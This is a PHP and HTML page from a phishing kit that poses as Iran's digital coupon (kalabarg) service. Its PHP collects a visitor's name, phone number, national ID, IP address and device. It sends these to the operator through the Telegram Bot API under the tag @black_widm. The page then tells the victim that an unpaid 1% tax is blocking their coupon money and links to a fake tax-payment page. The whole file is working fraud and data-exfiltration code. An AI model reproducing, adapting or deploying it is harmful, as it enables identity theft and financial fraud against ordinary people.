<?php
//@black_Widm
date_default_timezone_set('Asia/Tehran');
include "info.php" ;
$ip = $_SERVER['REMOTE_ADDR'];
$Device = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[4],")");
$name = $_POST["name"];
$phone = $_POST["phone"];
$meli= $_POST["meli"];

$timestamp = time();
$date_time = date('H:i:s', $timestamp);
    
    $dataname = file_get_contents("../data/$ip-fullname.txt");
$sode = file_get_contents("../data/$ip-sod.txt");
$melic = file_get_contents("../data/$ip-meli.txt");

$blackwid = "  
Login App  [ $Device ]

-- PhoneNumber : [ <code>$phone</code> ]
-- Action : $date_time DONE
-- IP « $ip 

--| @black_widm
➖
";
function Tel($method,$Bot=[]){
global $TOKEN;
$url = "https://api.telegram.org/bot$TOKEN/".$method;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$Bot);
$res = curl_exec($ch);
if(curl_error($ch)){
var_dump(curl_error($ch));
}else{
return json_decode($res);
}
}
Tel('sendMessage',[
'chat_id'=>$ID,
'text'=>"$blackwid",
'parse_mode'=>"HTML",
'reply_markup' => json_encode([
'inline_keyboard' => [
[["text" => "BLACKP0SH", 'url' => "https://t.me/BLACKP0SH"],["text" => "$ip", 'url' => "https://check-host.net/ip-info?host=$ip"]],
]
])
]);
?>	

<html lang="fa" dir="rtl">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>سامانه کالابرگ دیجیتال</title>
    <style>
        @font-face {
            font-family: 'vazir';
            src: url(./font/Vazir.eot);
            src: url(./font/Vazir.ttf);
        }

        body {
            font-family: vazir;
        }
    </style>
    <script src="https://cdn.tailwindcss.com"></script>
</head>

<body
    >
    <div class="flex text-blue-400 mt-4 text-lg items-center gap-2 justify-center">
        <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="currentColor"
            class="bi bi-phone bg-white p-0.5 rounded-full" viewBox="0 0 16 16">
            <path
                d="M11 1a1 1 0 0 1 1 1v12a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V2a1 1 0 0 1 1-1zM5 0a2 2 0 0 0-2 2v12a2 2 0 0 0 2 2h6a2 2 0 0 0 2-2V2a2 2 0 0 0-2-2z" />
            <path d="M8 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2" />
        </svg>
        مبلغ سود کالابرگ شما : <?php echo $sode;?>
    </div>
    <div class="text-green-500 flex flex-col items-center mt-10">
        <svg xmlns="http://www.w3.org/2000/svg" width="300" height="300" fill="currentColor" class="bi bi-check-lg"
            viewBox="0 0 16 16">
            <path
                d="M12.736 3.97a.733.733 0 0 1 1.047 0c.286.289.29.756.01 1.05L7.88 12.01a.733.733 0 0 1-1.065.02L3.217 8.384a.757.757 0 0 1 0-1.06.733.733 0 0 1 1.047 0l3.052 3.093 5.4-6.425z" />
        </svg>
        <span class="text-gray-900">نام ثبت شده :<?php echo $dataname?>
        </span>
        <br>
        	    <span class="text-gray-900">کد ملی ثبت شده :<?php echo $melic?>
        </span>
        <br>
        <span class="text-blue-500">
        متقاضی گرامی، شما 1%مالیات مبلغ کالابرگ خود را پرداخت نکرده اید به همین دلیل مبلغ اعلام شده به حساب بانکی شما ارسال نشده است
         </span>
         <span class="text-blue-500">
        از طریق دکمه زیر مالیات مشمول را پرداخت نمونده و بعد از ۶ ساعت مبلغ کالابرگ به حساب جاری ارسال خواهد شد.
         </span>
         
    </div>
    <div class="mt-10 text-center">
        <a href="pay" class="mt-10 text-2xl bg-yellow-500 p-1 rounded-lg">پرداخت مالیات</a>
    </div>
</body>

</html>